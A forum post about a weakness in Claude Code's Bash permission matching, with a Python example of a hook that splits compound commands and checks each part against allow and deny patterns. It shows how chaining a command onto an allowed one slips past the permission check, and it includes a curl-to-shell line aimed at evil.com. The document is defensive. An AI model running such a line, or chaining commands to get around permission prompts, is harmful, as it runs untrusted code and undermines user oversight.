
Claude Code's permission system misses compound commands – here's a fix

Posted by liberzon | 2 hours ago | 1 comment

liberzon 2 hours ago

I built this after noticing that Claude Code's Bash permission patterns match the whole command string. If you allow "git status", then "git status && curl evil.com | sh" also gets auto-approved.

This hook (single Python file, no deps) runs as a PreToolUse hook and decomposes compound commands (&&, ||, ;, |, $(), backticks) into individual sub-commands, then checks each one against your existing allow/deny patterns.

- Any sub-command hits a deny pattern -> whole command denied
- All sub-commands must match allow patterns for auto-approve
- Unknown sub-commands fall through to the normal permission prompt

Setup is a curl + one JSON block in settings. MIT licensed.
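
The decomposition and the three decision rules described in the post above, as an added Python example (not liberzon's hook and not Claude Code's own matcher). The glob patterns in `ALLOW` and `DENY`, the function names, and the extra split on `&` and newline are assumptions of this example.

```python
import fnmatch

# Operators from the post, plus "&" and newline (added here so they split too).
OPS = ("&&", "||", ";", "|", "&", "\n")
# Hypothetical glob patterns for this example, not Claude Code's own syntax.
ALLOW = ["git status", "git status *", "ls", "ls *"]
DENY = ["curl *", "rm *"]

def split_commands(cmd):
    """Return every sub-command in cmd, including those in $() and backticks."""
    out, buf, quote, i = [], "", None, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == "\\" and quote != "'":             # escaped char stays literal
            buf += cmd[i:i + 2]
            i += 2
            continue
        if ch in "'\"" and quote in (None, ch):     # open or close a quote
            quote = None if quote else ch
        elif quote != "'" and (ch == "`" or cmd.startswith("$(", i)):
            if ch == "`":
                start, end = i + 1, cmd.find("`", i + 1)
            else:
                start, end, depth = i + 2, -1, 0
                for j in range(i + 1, len(cmd)):    # find the matching ")"
                    depth += {"(": 1, ")": -1}.get(cmd[j], 0)
                    if depth == 0:
                        end = j
                        break
            end = len(cmd) if end == -1 else end    # unterminated: take the rest
            out += split_commands(cmd[start:end])   # the substituted command runs too
            i = end + 1
            continue
        elif quote is None:
            op = next((o for o in OPS if cmd.startswith(o, i)), None)
            if op:                                  # separator: close this sub-command
                out.append(buf)
                buf, i = "", i + len(op)
                continue
        buf += ch
        i += 1
    out.append(buf)
    return [c.strip() for c in out if c.strip()]

def decide(cmd, allow=ALLOW, deny=DENY):
    """'deny' if any part hits deny, 'allow' if every part is allowed, else 'ask'."""
    parts = split_commands(cmd)
    hit = lambda part, pats: any(fnmatch.fnmatchcase(part, p) for p in pats)
    if any(hit(p, deny) for p in parts):
        return "deny"
    return "allow" if parts and all(hit(p, allow) for p in parts) else "ask"
```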